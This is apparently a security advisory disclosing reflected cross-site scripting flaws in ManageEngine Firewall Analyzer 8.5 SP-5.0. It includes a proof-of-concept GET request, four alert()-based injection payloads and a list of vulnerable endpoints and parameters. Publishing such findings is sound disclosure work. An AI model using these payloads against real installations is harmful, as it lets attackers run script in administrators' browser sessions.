ManageEngine Firewall Analyzer 8.5 SP-5.0 Multiple XSS Vulnerabilities


Vendor: Zoho Corporation Pvt. Ltd.
Product web page: https://www.manageengine.com
Affected version: 8.5 SP-5.0 (Build 8500)

Summary: ManageEngine Firewall Analyzer is an agent-less log analytics
and configuration management software that helps network administrators
to centrally collect, archive, analyze their security device logs and
generate forensic reports out of it.

Desc: Firewall Analyzer suffers from multiple reflected cross-site scripting
vulnerabilities when input passed via several parameters to several scripts is
not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context
of an affected site.

Tested on: Apache-Coyote/1.1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5307
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5307.php


26.01.2016
-


----
PoC:

GET /fw/addbookmark.do?module=FIREWALL&bk_url=%2ffw%2fmindex.do%3furl%3dfirereport%26reportId%3d2000000304%26tab%3dreport%26subTab%3dshowReport%26RBBGID%3d116'accesskey%3d'x'onclick%3d'alert(1)'%2f%2f HTTP/1.1
Host: 10.0.2.48

---------
Payloads:

 'accesskey='x'onclick='alert(1)'//
 ';alert(2)//
 "><script>alert(3)</script>
 "-alert(4)-"

---------------------
Other GET parameters:

http://10.0.2.48/fw/addbookmark.do      - module
http://10.0.2.48/fw/createProfile.do    - subTab
http://10.0.2.48/fw/editUserFormPage.do - editAction
http://10.0.2.48/fw/graphs              - height
http://10.0.2.48/fw/graphs              - width
http://10.0.2.48/fw/index2.do           - subTab
http://10.0.2.48/fw/index2.do           - url
http://10.0.2.48/fw/mindex.do           - RBBGID
http://10.0.2.48/fw/mindex.do           - reportId
http://10.0.2.48/fw/mindex.do           - subTab
http://10.0.2.48/fw/mindex.do           - url
http://10.0.2.48/fw/reportFilter.do     - reportId